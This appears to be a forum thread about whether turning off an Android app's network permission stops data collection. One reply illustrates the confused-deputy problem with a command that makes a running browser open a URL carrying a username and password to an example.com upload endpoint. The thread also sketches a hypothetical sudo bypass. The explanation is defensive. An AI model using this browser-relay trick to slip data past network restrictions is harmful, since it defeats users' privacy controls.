theres a bunch of customizastion apps (icon packs, launchers etc.) that look really cool but lowkey collect my data, but if I just turn off the apps network permissons (app info, mobile data usage, and then set allow network access to off) do I still need to worry about data collection? thank
No and yes? I would assume as SOON as you turn on the network for that app theres a risk of the app uploading all the data it has collected
oh damn, that could happen right after I download the app grr
I’m pretty sure apps can’t start until the user chooses to launch them, so in that time you could either disable the permission or turn off your device’s internet. Assuming you need a VPN so you can’t just use NetGuard?
yea sadly I want to use a vpn so I can’t use netguard
Rethink DNS (on f-droid) offers the option to use WireGuard profiles from a your VPN provider if you supply it. Most providers allow that option.
Rethink allows disabling network access, firewalling, and DNS adblocking.
I’m not really sure if it’s a problem on mobile, but even if network access is disabled for a process & its children, it may have access to processes that do have access.
As an example, open a firefox-based browser (not sure about chromium). Then, in a new terminal window, run the following command:
firefox lemmy.ml, substitutingfirefoxfor the name of the open browser. Lemmy.ml should now be open in a new tab in the original browser window.It doesn’t really matter if a program opens lemmy, but it can open any URL, like for example:
https://example.com/data_vacuum/upload?user=ferric_carcinization&password=password123&pronouns=they-them&favorite-language=rustI might be mistaken, but I think on Android you (as an app developer) can’t just launch things in specific other apps, and you can instead only launch a type of action but the user would be prompted to select an app to complete the action with (until the user chooses the default app for that type of action from that app).
Will these connections show up in the network logs? If so, then one can at least know if connections ate bring made and try to block it. I’d appreciate it if anyone could explain .
It will show up as coming from firefox. When you run the command with the browser already running, it tells the original browser process to open the tab, then exits. The restricted process never does any network I/O by itself.
and try to block it.
You would have to know in advance all the domains the malicious program would access and block them, so realistically, no, at least not pre-emptively.
Thanks for that. This confirms my suspicion. I remember individually blocking so many donations when on Win10. Its impossible tip keep up with them all. I had a feeling that many of these domains just keep getting regard with new addresses every few days. Really frustrating.
This is… actually clever. Have you seen any incidents that involved the usage of this or is this common malware technique or something?
I’m not sure if this specifically is used, as it requires the browser to be already running. If not, the new browser instance is spawned as a child process to the malicious program, inheriting all of its restrictions.
In general, if you don’t have permission to do something yourself, it’s common to find someone who does and ask nicely (or maliciously) for them to do it on your behalf. This is called the confused deputy problem.
See also the security problems related to the setuid bit.
For example, sudo should be owned by root and have the setuid bit set. This means that every time you run sudo, it runs with the permissions of the root user. Now, sudo is typically strict about checking if you’re really allowed to run commands with elevated permissions, and only executes the command you give if it’s sure that ypu’re allowed to.
But, suppose that you could replace the call to the password cheking function with a call to exec. Now, your password is interpreted as a file path and the file it points to is run with the sudo process’ peemissions (root). Authentication has now been bypassed.
It was a made-up example, but I hope that it illustrates the point.
In the real world, buffer overflows can potentially write user-supplied data over something important, essentially giving you a chance of achieving something similar. (Incidentally, the Rust programming language practically eliminates this class of memory-related bugs.)
(app info, mobile data usage, and then set allow network access to off)
If that includes wifi then you’re probably fine. There’s a bunch of other protocols an app might leak data over, such as Bluetooth, NFC, Calls/SMS, USB, etc., but they’re all quite niche compared to a regular internet connection.
can they really do anything with that even if they don’t have like sms permissions or whatever?
They’d need permission and even then most attacks would need to be impractical. It’s something to keep in mind but I wouldn’t lose sleep over it.
ah alright I guess it’s not a BIG deal lowkey
mostly no, but they may still get net access if you’re rooted and allow root perms for that app. otherwise i’d say it’s fine.
my phone’s not rooted so I guess i’m fine




